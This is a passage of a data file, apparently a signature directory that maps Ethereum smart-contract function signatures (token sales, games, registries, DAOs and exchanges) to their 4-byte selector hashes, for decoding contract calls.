"medalBalanceOf(address)": "0x0407dc78", "AnnoMedal()": "0xa47e7110", "REIToken()": "0xd11e77e4", "allocLastTxRewardByHand()": "0x4ea2ea9f", "WithdrawETH()": "0x0f1df574", "DepositETH()": "0xfba246de", "doReward()": "0x4daaa98f", "calcpustprice(uint256,uint256)": "0xa347ef84", "whichEpoch(uint256)": "0xe49168f3", "exerciseOption(uint256)": "0xf52f2526", "chgExchangeRate(uint256)": "0x6cf1a452", "transferOrigin(address,uint256)": "0x9063e860", "isUpcoin()": "0x327fc33c", "setMinimumprice(uint256)": "0x384af0de", "QYQ(uint256,string,string,address)": "0xead3a1de", "getProperty(address,bytes32)": "0x1a421103", "setProperty(address,bytes32,bytes32)": "0x387787ed", "processTransferToICAPResult(address,bytes32,uint256,bool)": "0xb95af889", "processTransferResult(address,address,uint256,bool)": "0xd4db3791", "isTransferToICAPAllowed(address,bytes32,uint256)": "0x8d6c58ab", "getProvider(uint256)": "0x5c42d079", "getProviders()": "0xedc922a9", "setProviders(address[])": "0x1b98f6ac", "transferFrom(uint256,address)": "0xaed4839a", "initialize(address[4],address,uint256[12],uint256,bytes,address)": "0xee786838", "_burn()": "0x144f2f94", "withdrawVPC0xTokens(address)": "0x3ef4c16b", "VPC0x()": "0xd5a34dfb", "presaleGoalReached()": "0x1090a638", "overrideLock(bool)": "0xf849acb8", "transferWhileLocked(address,uint256)": "0x4698ad05", "OATToken(address,uint256)": "0x665e06ac", "PayIreward()": "0x987c9efd", "EXToken()": "0xd4653a3b", "Token(uint256,string,uint8,string,string)": "0xc7b9bc9e", "LhsToken(uint256,string,uint8,string)": "0x844bdea4", "randomTeam()": "0xc2d83718", "janwin(uint256,uint256)": "0xe7e024ce", "getCurrentPotInfo()": "0xc6a4f4af", "InternetMarket()": "0xad652cdd", "erc20MRL(uint8)": "0x47c9301f", "Cryptosquirrel()": "0x7480a676", "majorityMargin()": "0xaa02a90f", "minimumQuorum()": "0x8160f0b5", "debatingPeriodInMinutes()": "0x69bd3436", "members(uint256)": "0x5daf08ca", "numProposals()": "0x400e3949", "memberId(address)": "0x39106821", "fixedExp(int256)": "0xde43844b", "fixedLog(uint256)": "0x50c90136", "getEtherForTokens(uint256)": "0xb9f308f2", "getEtherForTokensOld(uint256)": "0x80aa5757", "calculateDividendTokens(uint256,uint256)": "0xbda5c450", "getTokensForEther(uint256)": "0x62dbf261", "realReserve()": "0xcb639322", "reserve()": "0xcd3293de", "totalDiv()": "0xa1ca70f4", "realDividends(address)": "0x1c990670", "dividends(address)": "0x68306e43", "sellPrice()": "0x4b750334", "buyPrice()": "0x8620410b", "getMeOutOfHere()": "0xb1e35242", "sellMyTokens()": "0xe555c1a3", "reinvestDividends()": "0x957b2e56", "GetMyBet()": "0x02a2f06e", "ClaimMyBet()": "0x1015295c", "SubFromDividends(uint256)": "0x342368e4", "AddToDividends(uint256)": "0x42c23db5", "PlaceBet(uint256,bytes)": "0x24f731d5", "BetPayout()": "0x6d15dc5a", "GetNumber(address,uint256)": "0x1d2b63bf", "GroupMultiplier(uint256,uint256)": "0xa10daf4b", "_sortTopQuestions()": "0x048eb854", "_recalculateTopQuestionsOnVote(uint256,uint256,uint256)": "0x4444c51f", "shuffle()": "0x2520bf04", "CryptoRoulette()": "0x688a7044", "_payoutMining(uint256,address,address)": "0x8a67f04b", "_payoutMining(uint256,address)": "0x46807803", "levelUpMining(uint256)": "0x6520ca0d", "createMineForToken(uint256)": "0xab0cd5bc", "CollectibleToken()": "0x92c88a40", "_transferToken(address,address,uint256)": "0xce1afbe1", "_createCollectible(uint256,uint256)": "0x279e1c43", "_approved(address,uint256)": "0x16b3d4ae", "_addressNotNull(address,address)": "0x8c9ce20c", "_payout(address,uint256)": "0x9b836d1a", "getCostToNextLevel(uint256)": "0xfe77f5e5", "SYMBOL()": "0xf76f8d78", "acceptCeoOwnership()": "0xf35ba5d3", "tokenBalanceOf(address)": "0xe42c08f2", "getCollectibleWithMeta(uint256)": "0xe1187e2e", "unlockToken(uint256)": "0xdd2e0ac0", "takeOwnership(uint256)": "0xb2e6ceeb", "cooAddress()": "0xb047fb50", "createPromoCollectible(uint256,address,uint256)": "0xad731de7", "transferTokenFrom(address,address,uint256)": "0xad221195", "tokenIndexToApproved(uint256)": "0xa8bd9c32", "NAME()": "0xa3f4df7e", "changeEarnings(uint256)": "0xa0954a49", "getNextPrice(uint256)": "0x976e0da9", "unlocked(uint256)": "0x8b1cf21c", "createMineForToken(uint256,uint256,uint256,uint256)": "0x87521056", "acceptCooOwnership()": "0x86f7993e", "tokensOfOwner(address)": "0x8462151c", "tokenIndexToPrice(uint256)": "0x804afffb", "createPromoCollectiblesWithMining(uint256[],address[],uint256[],uint256[],uint256[],uint256[])": "0x7305dce1", "getCollectible(uint256)": "0x72d99675", "getMiningMeta(uint256)": "0x709a36e6", "getTokenIds()": "0x67f718a9", "isChangePriceLocked()": "0x676d23a5", "payoutMining(uint256)": "0x63fd420c", "changeTokenPrice(uint256,uint256)": "0x62e8e8ac", "implementsERC721YC()": "0x61d61998", "tokens(uint256)": "0x4f64b2be", "getEarnEachBlock()": "0x4a5c8f1a", "_ownsToken(address,uint256)": "0x43ca46dd", "getInitialPriceOfToken(uint256)": "0x43a7f749", "createPromoCollectibleWithMining(uint256,address,uint256,uint256,uint256,uint256)": "0x4074c648", "unlockTokenPriceChange()": "0x402d5f2e", "DECIMALS()": "0x2e0f2625", "setCOO(address)": "0x2ba73c15", "setCEO(address)": "0x27d7874c", "tokenIndexToOwner(uint256)": "0x1d36e06c", "upgradeMining(uint256,uint256)": "0x1d32a70c", "transferToken(address,uint256)": "0x1072cbea", "ceoAddress()": "0x0a0f8168", "getTotalTokenSupply()": "0x047087cc", "approveToken(address,uint256)": "0x022fc88b", "recalculateTopScores(uint256,uint256,uint256)": "0x91af8d14", "hotQuestion(uint256,uint256,uint256)": "0x9982257b", "sortTopTen()": "0x05839b29", "getQuestionFinalizable(uint256)": "0x3694629a", "set(string,address)": "0xa815ff15", "DispatchHub()": "0x1a0be73f", "assumeControl()": "0xcaa4c5d0", "transferControl(address)": "0x6d16fa41", "Controlled(address)": "0x8e17de8b", "abandonShip()": "0x98e02be7", "signup(bytes32)": "0x5c1397de", "login()": "0xb34e97e8", "Quecoin()": "0x01828e61", "processARvRevForecast()": "0xb9980306", "processAR(uint256)": "0xdfde567f", "createInvoice(uint256)": "0x1414ef78", "processAP()": "0xbe616e83", "transferOwnership(address,uint256)": "0x0a276680", "setInitialState(address[],uint256[],address[],uint256[100][],uint256[],uint256,uint256,uint256,uint256)": "0x99693026", "SSE()": "0x5827c0c8", "setString(bytes)": "0xb4d07e81", "setName(bytes2)": "0x048de56d", "setData(uint256)": "0x5b4b73a9", "depositBond(uint256)": "0x4dcb05f9", "RequiredBondRules(address)": "0x6cfab740", "testChangeBet()": "0x06114d36", "testPlaceBet()": "0xdfc74cb4", "getWorkflowActivity(uint256,uint256)": "0x352e1dff", "endContract()": "0xbb6e7de9", "give()": "0x9e96a23a", "SelfDestruct()": "0xdba5e917", "isAuditor(address)": "0x49b90557", "isGoldRegistry(address)": "0xec1d9bf4", "auditorRegistry()": "0xc8028bee", "custodianRegistry()": "0x28b2362f", "vendorRegistry()": "0x012beac9", "getAuthorizedAddresses()": "0xd39de6e9", "removeAuthorizedAddress(address)": "0x70712939", "addAuthorizedAddress(address)": "0x42f1181e", "transferToContract(address,address,uint256,bytes)": "0xd5ff0e7b", "premium(bool,address,address,address,address[],uint256[])": "0x5136099c", "set(bytes4,uint8,uint8)": "0xbfef9627", "wipe()": "0xb13b4f2d", "CanvasFrag()": "0x3525d66d", "addThing(string,string,string,bytes32)": "0x0c3890b7", "removeFromWhiteList(string,address)": "0x9d06a1d5", "removeFromBlackList(string,address)": "0x637666ce", "isAddrCanCallServer(string,address)": "0xba847552", "isAddressInWhiteList(string,address)": "0x04a23be0", "isAddressInBlackList(string,address)": "0xfdae8a4c", "addToWhiteList(string,address)": "0xcef6cfb2", "addToBlackList(string,address)": "0x28ea6aab", "getContractServerBlackWhiteListType(string)": "0x81252548", "setContractServerBlackWhiteListType(string,uint256)": "0xd3cea787", "destructSelf(address)": "0x9be6d404", "BoardRoom(address)": "0x551e6ba6", "createdBy(uint256)": "0x001baa89", "createdOn(uint256)": "0x603d1ed9", "debatePeriodOf(uint256)": "0x5fdbba04", "valueOf(uint256)": "0xcadf338f", "proxyOf(uint256)": "0xb8867485", "destinationOf(uint256)": "0xf76b8c5e", "hasVoted(uint256,address)": "0x43859632", "voteOf(uint256,address)": "0x45ddc85d", "positionWeightOf(uint256,uint256)": "0x7a43cb62", "numVoters(uint256)": "0xa4b195ff", "voterAddressOf(uint256,uint256)": "0xa294ed7a", "changeRules(address)": "0xc3aeacdf", "execute(uint256,bytes)": "0x59efcb15", "newProposal(string,address,uint256,address,uint256,bytes)": "0xef41f95a", "multiMint(int256,uint256[])": "0x6c131dbe", "SGT(address)": "0x25b72273", "is_kyced(address)": "0x210846ae", "hash_of(address)": "0xe4fa8fc3", "state_of(address)": "0x00bca785", "reject(address)": "0xab0da5a9", "accept(address)": "0x9f005920", "submit(bytes32)": "0xd9caa3d2", "client_address(address)": "0x9016bc21", "set_validator(address)": "0x226ee47c", "sayHello()": "0xef5fb05b", "init(address,uint256,uint256)": "0xa4a2a9f6", "TokenMintPoD(int256)": "0xffec34e3", "getAllPublishers()": "0x4c96f281", "getPublisher(address)": "0x8b043e08", "updateUrl(address,bytes32[5],address)": "0x488dc208", "register(address,bytes32[5],address)": "0x15ba9ea2", "buyEnergy(address,address,uint256)": "0x2290db50", "consumeEnergy(address,uint256)": "0x34f9445e", "setProduction(uint256)": "0x567cc2b6", "addSeller(address)": "0xd93fabfa", "nbSellers()": "0xc0f4bfa4", "sendCoin(address,address,address,uint256)": "0x42b41aa4", "Daisee()": "0x7310c2e0", "getStringValue(uint256)": "0xc0c116d5", "getUIntValue(uint256)": "0x64c66395", "getAddressValue(uint256)": "0x230a8020", "getCreated(uint256)": "0x9cb2b69b", "getType(uint256)": "0x4036ab78", "emitEvent(string,address,address,uint256,uint256,string,string)": "0x97a8c6ec", "changeLocalCryptoContract(address,string)": "0x3b7da659", "changeWaveVoteContract(address,string)": "0xf43532ac", "WaveVoteContractRegistery()": "0x56ce6377", "performTransfers(address[],uint256[])": "0x24e7c824", "parseSums(bytes)": "0x41107bee", "parseImpressions(uint64,bytes)": "0xbcb638cb", "settle(address,uint64,uint64,bytes)": "0x8222aa1e", "createChannel(string,bytes,address,address,address[],uint256[],address,uint32[])": "0x243870bd", "RtbSettlementContract(address,address,address,uint256)": "0x5941d8d4", "EasyMineToken(address,address,address,address)": "0xbabe9394", "sendAliceBlue(address,uint16,uint256)": "0xce47e604", "target3()": "0xd899e112", "target2()": "0xa6e8a859", "contributions()": "0x029eabcb", "allowedMinting()": "0x35b7588f", "winningCountry()": "0x84696810", "THRESHOLD3()": "0x4be9b992", "hodlerTotalValue3M()": "0xc899fa77", "_bounty()": "0x196c9909", "jotAllowance()": "0xa5ef9915", "m_foundersTokensStorage()": "0xb397ffd8", "preBuyPrice1()": "0xd719213e", "team1LockEndTime()": "0x3c13ec32", "lastMiningTime()": "0xac73e97e", "tokenManager()": "0x2a709b14", "lowCapTxWei()": "0x38d2b172", "winsReported()": "0x16b07323", "currentKey()": "0xa0ddb418", "PRICE_BTCS()": "0xeac1e58f", "MAX_ALLOWED_STAGE_2()": "0xbf6eb070", "sideServicesCount()": "0x38ce1df8", "bonusClosingTime0()": "0x85796a2d", "startPreSale2()": "0x100278d8", "icoMinimumWei()": "0x0890e86e", "initGold()": "0x952c0f9f", "team1Points()": "0xa36ff98b", "teamName()": "0x82474b1b", "voteWeight()": "0xd712eb4a", "requiredToAddress()": "0x384c3335", "BLOCK_BASIC_PRICE()": "0x208c1019", "isFunding()": "0x13b53153", "preICOEnds()": "0xfc5fc8ae", "ownerWithdrawTo()": "0x4871c4c1", "gameCount()": "0x4d1975b4", "proposalBlock()": "0x216aa0ba", "kittiesContract()": "0x3432000c", "currentwealth()": "0x67579ad4", "vaultPercentOfTotal()": "0x08e496ea", "COMMISSION_RATE()": "0x1a454ea6", "END_OF_MINT_DATE()": "0x568c2163", "minFundedValue()": "0xad5d638d", "authorizedSupply()": "0x189aff3a", "pausestatus()": "0xa6a3ba2b", "tokenCreationMax()": "0x1f97c00e", "currentActiveGameID()": "0xb0ac0ef2", "endICO_w1()": "0xa1bf8a9d", "isGenerator()": "0xc3f0dad9", "THREE_YEAR_KEEPING()": "0x4f8fe6a4", "businessPlannedPeriodDuration()": "0xf5207c31", "isReachCapped()": "0x02a1a7a8", "VULCAN_PROMETHEUS_EXTRACTION_BASE()": "0x936fddcb", "partner()": "0xbe10862b", "numberOfPixels()": "0x58d2ab45", "secondThawDate()": "0x44ee398b", "sumHardCapICOStage3()": "0x95e05110", "icoOver3()": "0x300d9e90", "skl()": "0xe5d17171", "customerCount()": "0x9757e8a3", "nextYear()": "0x146bea7b", "unlockTeamTime()": "0x8c71bed2", "getEthUsdPrice()": "0xa0a8045e", "LottesyAddress()": "0xd71f1bd6", "_mySymbol()": "0xbc77b919", "setMythicalGravatar()": "0x1d4f2c6d", "PVP_INTERVAL()": "0x1924f74a", "isAirdropStopped()": "0x9ac4fa49", "hardCapFundingGoalInCents()": "0x23fe5b90", "pewdiepie()": "0x653fcf4c", "devWallet()": "0x8ea5220f", "numTickets()": "0x353d90ec", "collectedBcy()": "0x57babe2e", "privateEndTime()": "0x09ab8a03", "sale2Started()": "0xa7eea700", "advisorsAccount()": "0x1ddde716", "totalRegularTokensSold()": "0x7df042a2", "leaderTimestamp()": "0xe2896598", "totalInvestment()": "0x10ea13df", "ownershipDeadline()": "0x9b7e5531", "TOKEN_ICO3_LIMIT()": "0xd29e319c", "newReward()": "0x2cfdd7df", "shares_holders_count()": "0x2aa056cd", "tokensSent()": "0x1f130761", "end2Timestamp()": "0xf4fab748", "PRE_ICO_MINIMUM_CONTRIBUTION()": "0x899231ef", "startPrivateICO()": "0x9d9a5e1c", "adventureDataContract()": "0x6ebe299f", "firstPeriodCap()": "0x5ddd81b0", "latestReleaseTime()": "0x299ffcbc", "phase2Price()": "0x329eac15", "seedEndTime()": "0x2638b25c", "cycleMintSupply()": "0x254a46f4", "currentTotalAirDrop()": "0xf4412803", "fundsWithdrawnByOwners()": "0x460485e0", "privateSaleEndTime()": "0xe77ff818", "tokenFund()": "0x3d2d8263", "TokensPerETH()": "0xe4492fcd", "addressFundAdministration()": "0x2a75a2ac", "CONTRIBUTION_MAX_NO_WHITELIST()": "0x5655e37b", "supplyExponent()": "0x17f143e1", "team_and_angel_beneficiary()": "0xb2ba97de", "angelInvestorsTokens()": "0xd6a6da3e", "bnbWithdrawEnabled()": "0x11738735", "InitiateCryptoGamers()": "0x7a2e41d1", "getAgonIdArray(address)": "0x6d57e2a9", "getMaxAgonId()": "0xb9aa8236", "getAgonArray(uint64,uint64)": "0x1531076c", "getAgon(uint256)": "0x549c7b58", "fightAgon(uint64,uint64,uint256,uint256)": "0xf696c4ed", "newChallenge(uint64,uint64)": "0x26180224", "cancelAgonForce(uint64)": "0x6044ce6e", "cancelAgon(uint64)": "0xf0af7e65", "_removeAgonIdByOwner(address,uint64)": "0x88afe426", "newAgon(uint64,uint64)": "0xa87e0c33", "setAgonValues(uint256[5])": "0x16512624", "setMaxResolvedAgonId()": "0x750240a2", "setAgonFight(address)": "0x271a50db", "setMaxAgonCount(uint256)": "0x79859a78", "setArenaPool(address)": "0x752c8777", "ActionAgon()": "0x60dab6be", "calcFight(uint64,uint64,uint256,uint256)": "0xc63c1a27", "SuomenMarkka()": "0x557d0195", "DRAKE()": "0x3466f07f", "collect(address,address,uint256,bytes32,bytes32,uint8)": "0x6029b13f", "isCollectSignatureCorrect(address,address,uint256,bytes32,bytes32,uint8)": "0x140cc562", "collectMessage(address,address,uint256)": "0x3f62c084", "isQuorum(address[3])": "0x183f9bcf", "replaceAdmin(address,address)": "0x5a811766", "prefixedHash(bytes32)": "0xbcbc9175", "transferAdminMessage(address,address)": "0x5789b1cd", "transferOwnershipMessage(address)": "0xfae59753", "transferOwnership(address,bytes32[3],bytes32[3],uint8[3])": "0x3638fb00", "changeAdmin(address,address,bytes32[3],bytes32[3],uint8[3])": "0x3ea376fc", "importGenesisPairs(address[],address[])": "0x82e93309", "addGenesisPairs()": "0xc8544e81", "SetGasSell(uint256)": "0xb5e574e9", "SetGasBuy(uint256)": "0x3d28bab2", "Sale()": "0xb78f9de7", "BitQ()": "0x4692d7e3", "transferAndFrozen(address,uint256)": "0xf3164eb6", "NDT3()": "0x2701ebd8", "registerProxy()": "0xddd81f82", "revokeAuthentication(address)": "0x53376d1f", "endGrantAuthentication(address)": "0x38b6e407", "startGrantAuthentication(address)": "0xd4e8e063", "setRevoke(bool)": "0x4c93505f", "canSettleOrder(uint256,uint256)": "0xfed8b30a", "atomicMatch_(address[14],uint256[18],uint8[8],bytes,bytes,bytes,bytes,bytes,bytes,uint8[2],bytes32[5])": "0xab834bab", "calculateMatchPrice_(address[14],uint256[18],uint8[8],bytes,bytes,bytes,bytes,bytes,bytes)": "0xd537e131", "orderCalldataCanMatch(bytes,bytes,bytes,bytes)": "0x562b2ebc", "ordersCanMatch_(address[14],uint256[18],uint8[8],bytes,bytes,bytes,bytes,bytes,bytes)": "0x72593b4c", "testCopyAddress(address)": "0x3464af6a", "testCopy(bytes)": "0x3e1e292a", "guardedArrayReplace(bytes,bytes,bytes)": "0x239e83df", "chargeProtocolFee(address,address,uint256)": "0x16687369", "transferTokens(address,address,address,uint256)": "0x68155ec1", "changeProtocolFeeRecipient(address)": "0x514f0330", "changeMinimumTakerProtocolFee(uint256)": "0x1a6b13e2", "changeMinimumMakerProtocolFee(uint256)": "0x14350c24", "unsafeWriteUint8(uint256,uint8)": "0x7655e825", "unsafeWriteUint(uint256,uint256)": "0xeea95aaa", "unsafeWriteAddress(uint256,address)": "0xbfc99f5b", "unsafeWriteBytes(uint256,bytes)": "0x37f4dfea", "VouchCoin()": "0xb2c3429d", "SLABToken()": "0xd680914d", "startSale(uint256,uint256)": "0xf4f3122e", "payOutDividend()": "0x0b5982f0", "getRemainingTime()": "0xefb98bcf", "getRecordHolder(uint256)": "0x1e27ae4d", "getRecordBalance(address)": "0x268b0459", "createRecord()": "0x642f722c", "addTokenHolder(address)": "0xda498084", "addRecordEntry(address)": "0x4439ab32", "StakePoolICO()": "0x00f64e66", "StakePool(string,string,uint8,uint256,uint256)": "0x60d63425", "updatePremiums(address)": "0xa5fbdd41", "sendPremiumPack(uint256)": "0x8ba677fa", "getBalancePremiumsPaid(address)": "0x94f0080c", "getPremiumCount()": "0x67d5fae1", "getPremiumPack(uint256)": "0x9ec272b4", "getAttoTokensBoughtInICO()": "0xc99380c9", "getAttoTokensLeftForICO()": "0xed45e578", "getAttoTokensAmountPerWei(uint256)": "0xba49e21f", "getAttoTokensAmountPerWeiInternal(uint256)": "0x72f52a3e", "getCurrentPriceAttoTokensPerWei()": "0xc84ca867", "distributePreSoldShares()": "0xf6f17bba", "pullEtherFromContract()": "0xb6761717", "openICO()": "0xb587dc57", "calculateCurrentPrice(uint256)": "0xad74f9bc", "RKCToken()": "0x1514b9cb", "InvestorBonusGet(address[])": "0x8abcb485", "GetBonusInv()": "0x99999342", "_reward(address)": "0x6f9ba978", "repayment()": "0x17cd802d", "OrphanToken(address)": "0x0ab9059c", "STVCOIN(uint256,string,string)": "0x3bbacb55", "Bgc(uint256,string,string)": "0xf8c65bae", "MintFToken()": "0x3d05d0e6", "send(address,address,uint256)": "0x0779afe6", "update_ratio(uint256,uint256)": "0x066d76fe", "deauthorize(address)": "0x27c97fa5", "authorize(address,bool)": "0x2d1fb389", "pauseSale()": "0x55367ba9", "unpauseSale()": "0xbb33d729", "getCEO()": "0xc8b0e68d", "buyWorldCupTeamToken(uint256)": "0x2f2f4a63", "PresentToCEO()": "0xf82c09a3", "setWorldCupTeamDesc(uint256,string)": "0xe29e436a", "getWorlCupByID(uint256)": "0xe5aceac5", "payAllOut()": "0x5cade372", "GlobalSuperGameToken(uint256,string,string)": "0x371f468c", "emergencyDrawingReset()": "0x268c969a", "closeIt()": "0x773984dd", "addSomeGas()": "0xacaab181", "StpacToken()": "0xa26636f3", "changeTicket(address)": "0x4bee09e1", "changeFund(address)": "0x681b742f", "changeTicketOwner(address)": "0x9246177b", "refundGameAfterLongInactivity()": "0xee359959", "spotsLeft()": "0x4b960794", "increaseGame()": "0x45f63927", "distributeRemaining()": "0x9acf6ff4", "awardPrizes()": "0x37e50f39", "addParticipant(address,uint256)": "0x01e7fefe", "buyTicketsFor(address)": "0xa162c04c", "Slot(address)": "0xed18bc3f", "getUnlockTime()": "0x602bc62b", "Bitlike()": "0x293b1103", "Withdrawal(uint256)": "0x4e70a604", "getRemainTime()": "0xfc2615d5", "SafeTimeLock()": "0xf246317c", "depositHelpe(uint256)": "0xc3e93fa3", "ProofOfStableCoin()": "0xf9892c28", "preICOLedger()": "0x6b2f73c2", "rescueInvestor(address,uint256)": "0x1b6e66aa", "investedInPreICO()": "0x7a954d5d", "ProRataDistribution()": "0xa3f36da3", "IstriumToken(address,address)": "0x0c1688f7", "DiamondProjectToken()": "0x64861329", "BloxrouteToken()": "0xb525256f", "GoldenFleeceToken(uint256)": "0x0df428f0", "recoverLost(address,uint256)": "0xb44bd688", "forwardWei()": "0x7a360ec3", "getReward(address,address)": "0x6b091695", "claimImmediateTokens(address)": "0xf77da6d5", "singleUserSignUp(address,address)": "0xef78a5b2", "chkUserDetails(address,address)": "0xaa6e6539", "getAllStaff()": "0x032e0868", "getAllAdmin()": "0x31a36424", "chkStaff(address,address)": "0xcc8658b3", "chkAdmin(address,address)": "0xee4a0122", "adminRetrieveContractConfig3()": "0x11667335", "adminRetrieveContractConfig2()": "0xfd5f7256", "adminRetrieveContractConfig()": "0x416c0d38", "updateMultipleUsersReward(address[],uint256[])": "0xbc97fd06", "removeUserFromBlackList(address[])": "0x1fea96cd", "updUserBlackList(address[],address[])": "0x93a422bb", "removeUserWhitelist(address[])": "0xaf36e7a7", "signupUserWhitelist(address[],uint256[])": "0x55d0012d", "adminUpdatePayout(uint256,uint256,uint256,bool)": "0x440574eb", "adminUpdMinSign(uint256,uint256)": "0x783f28e6", "adminUpdateStartEndTime(uint256,uint256)": "0x11937ccd", "removeStaffWhitelist(address[])": "0x79db77a3", "addStaffWhitelist(address[])": "0x891aab6a", "removeAdminWhitelist(address[])": "0x1ab3d055", "addAdminWhitelist(address[])": "0xb4f4e284", "ownerRetrieveContractConfig2()": "0x314a05db", "ownerRetrieveTokenDetails()": "0xe48e0d69", "ownerUpdateOthers(uint256,bool,uint256,uint256,bool)": "0x0f59eb95", "HippieCoinv2()": "0x354e6ca7", "setOldToken(address)": "0x5b7a50f7", "setEtherDelta(address)": "0x5093cb38", "multiApprove(uint256[])": "0x5a53fe20", "multiTransfer(uint256[])": "0xb33fcc7a", "lockMultis()": "0x870bfc75", "Virtonomi()": "0x77381082", "WubCoin(address)": "0x4e47d99a", "digithothToken()": "0x6cc5ab24", "ProGenTech()": "0xeb222098", "DNACoin(address,address)": "0x224e5efd", "checkSigned(bytes32,uint8,bytes32,bytes32)": "0xd95ace6f", "testRecovery(bytes32,uint8,bytes32,bytes32)": "0x0242a5fc", "getKeccak(bytes32)": "0xe98e8a64", "whitelistMe(uint128,uint8,bytes32,bytes32)": "0xbda9b45c", "whitelistUser(address,uint128)": "0x4bb07665", "setWhitelisting(address,uint128)": "0x50e37961", "TokenTransferProxy()": "0xae1fb61a", "TimeBoxToken()": "0xb1546194", "Zeroexchange()": "0x6bdee235", "HUNDREDTIMES(uint256)": "0xd1cb923c", "MbbToken()": "0xf1398db1", "isGameLocked(address)": "0xe30922fc", "getGameLock(address)": "0x77b02a33", "removeGameManually(address,address)": "0xd9bb57c6", "generateChampionTokens(address,uint256,uint256)": "0xe6bb64b4", "removeApprovedGame(address)": "0x5ef9dde8", "addApprovedGame(address)": "0x27f6e676", "getNextElement(uint256)": "0x22d2cfac", "getElementLocation(address)": "0xbf485e95", "getAllElements()": "0x280ca666", "removeItem(address)": "0x399fa840", "addItem(address)": "0x7cf90fcc", "MIS()": "0xe8ee8b44", "PETRO(uint256,string,uint8,string)": "0x9306635a", "getGoldDataSerial()": "0xf17f29d0", "getGoldDataWeight()": "0x834c3351", "getGoldDataMinted()": "0xac4eefc5", "getGoldDataInitialized()": "0x013e5415", "registryRequestDocumentation()": "0x97fb070b", "registryRequestSku()": "0x73cf8f97", "registryRequestSerialNumber()": "0x7cf12ff8", "registryRequestWeight()": "0x39960940", "registryRequestVendor()": "0xa34d5312", "registryRequestCustodian()": "0xd24b06b7", "sendRegistration()": "0x8c6486c4", "initRegistryData(address,address,address)": "0x0dd8cdbb", "initGoldData(uint256,bytes32,bytes32,bytes32)": "0x9576b180", "Gold()": "0xc8449b65", "isRegistrar(address)": "0xd5db72eb", "isAuditor(address,address)": "0x6668ffc6", "isCustodian(address,address)": "0xb04b3f57", "isVendor(address,address)": "0x9c12deab", "unregisterAuditor(address,address)": "0xa330814c", "registerAuditor(address,address)": "0x2da2440c", "unregisterCustodian(address,address)": "0xf21b422a", "registerCustodian(address,address)": "0x4665975d", "unregisterVendor(address,address)": "0xe05a48cd", "registerVendor(address,address)": "0x6c7272ce", "unregisterAdmin(address)": "0x54d41bbd", "registerAdmin(address)": "0xc38c5813", "ParticipantRegistry()": "0xc6653041", "disable()": "0x2f2770db", "Logger(string,bool)": "0x578affb4", "logEvent(string,bool)": "0x95671ed7", "getLastHash()": "0x4a910046", "setFactories(address[],bool)": "0x08a8ce1f", "ChannelTimeout()": "0x39658245", "CloseChannel(bytes32,uint8,bytes32,bytes32,uint256)": "0xadacb0fa", "Channel(address,uint256)": "0xaaea53f3", "action(bytes32[])": "0x7ff4b630", "EthbetToken()": "0xf8ef13f4", "PFOffer(address,address,bytes32,uint256,uint256,uint128)": "0xc527326e", "linkImpact(string)": "0x1b07fcc1", "linkDirectly(string,uint256,uint256)": "0x31ff1ed9", "reclaimToken(address)": "0x17ffc320", "PayingBackContract()": "0x3eac5cac", "create(int256,int256)": "0xeb1257c5", "create(int256,int256,int256)": "0x9b6d96c5", "hash(string,uint256,uint256,address)": "0x9f5892a7", "hash(string,uint256,uint256,uint256)": "0x67e6bc2e", "hash(string,address)": "0x436d4ff5", "hash(string,uint256)": "0xbe25270f", "hash(string)": "0xb411ee94", "queryBalance(address)": "0x37f42841", "DSAuth()": "0x3b43fa0a", "base(uint256)": "0x6c6eb9d1", "authorizeEscrowService(address)": "0xd577ab70", "authorizeListingService(address)": "0x8551884a", "getListingService(uint8)": "0x55e0aece", "getListingDB(uint8)": "0xfadeb59c", "assignListingDB(address)": "0x5ec30be2", "abandonEscrowService(uint256)": "0x77dac983", "abandonListingService(uint256)": "0x33bd943e", "ListingRegistry(uint8,uint8,uint8,uint8)": "0x3e9c77f9", "abandon()": "0x88318834", "updateService(address,address)": "0xdea011f5", "multisig(address[],uint256)": "0x64ac12b1", "test_setupBoardRoomAndAssert()": "0x1fdfa40d", "greet(bytes32)": "0xe9ebeafe", "greeter()": "0x1c8499e5", "Greeter()": "0x777256c4", "TimeDecayingTokenEnvironment(uint256)": "0xfa3c8251", "refundTicket(address,uint256)": "0x705099b9", "changeQuota(uint256)": "0xa977c71e", "Conference()": "0x7b627879", "updateAddress()": "0xd59768a3", "executeWithdrawal()": "0xfa45aa00", "OpenFund(bytes32,string)": "0xb9e448df", "transferAndCall(address,uint256,bytes)": "0x4000aea0", "calculateNeededCollateral(uint256,uint256,uint256,int256,uint256)": "0xed981d4f", "absMax(int256,int256)": "0x61b7542d", "absMin(int256,int256)": "0x2ea6d6da", "isSameSign(int256,int256)": "0xc713b10f", "sign(int256)": "0xae610b48", "subtract(int256,int256)": "0xb93ea812", "divideFractional(uint256,uint256,uint256)": "0xc0e19314", "execScript(bytes,bytes,address[])": "0x279cea35", "validContract(uint32,uint32,address)": "0x89e198b4", "updateHours()": "0x2e1dea6b", "resetWallet()": "0x1895e858", "ManufactorWallet(string)": "0x93c958f3", "freezing(bool)": "0x36a23dbf", "transfer(address,address,uint256,bool)": "0x75219e4e", "getCurrentSchellingRoundID()": "0xe0e81ccb", "isICO()": "0x7ee55c97", "broadcastSchellingRound(uint256,uint256)": "0x41225b0e", "broadcastTransfer(address,address,uint256)": "0x97bff97f", "callDisableCallback(string)": "0x4772eb77", "dropModule(string,bool)": "0xc212bad5", "newModule(string,address,bool,bool)": "0x2b5daa86", "callReplaceCallback(string,address)": "0x9e213fb7", "replaceModule(string,address,bool)": "0x38b93440", "getModuleIDByAddress(address)": "0x31577cc0", "getModuleIDByName(string)": "0x2a5cd45e", "_getRevisionBlockNumber(bytes32,uint256)": "0x737c8ea1", "getContractId()": "0x4788cabf", "setNotTransferable(bytes32)": "0xb7d454a4", "setNotRetractable(bytes32)": "0x0d244d68", "setEnforceRevisions(bytes32)": "0xfe8b6642", "setNotUpdatable(bytes32)": "0x89ced196", "disown(bytes32)": "0xd93e7573", "transfer(bytes32,address)": "0x79ce9fac", "transferDisable(bytes32)": "0xaaac50bd", "transferEnable(bytes32)": "0x0eb8ed07", "retract(bytes32)": "0x117b4705", "restart(bytes32,bytes)": "0x2bf1f9da", "_deleteAllPackedRevisionBlockNumbers(bytes32)": "0x9b619d3b", "retractLatestRevision(bytes32)": "0x37664643", "updateLatestRevision(bytes32,bytes)": "0xf0cb556c", "createNewRevision(bytes32,bytes)": "0xf3e84cf3", "_setPackedBlockNumber(bytes32,uint256)": "0xf6469342", "create(bytes,bytes32,bool,bool,bool,bool,bool)": "0xeaa37394", "origin()": "0x938b5f32", 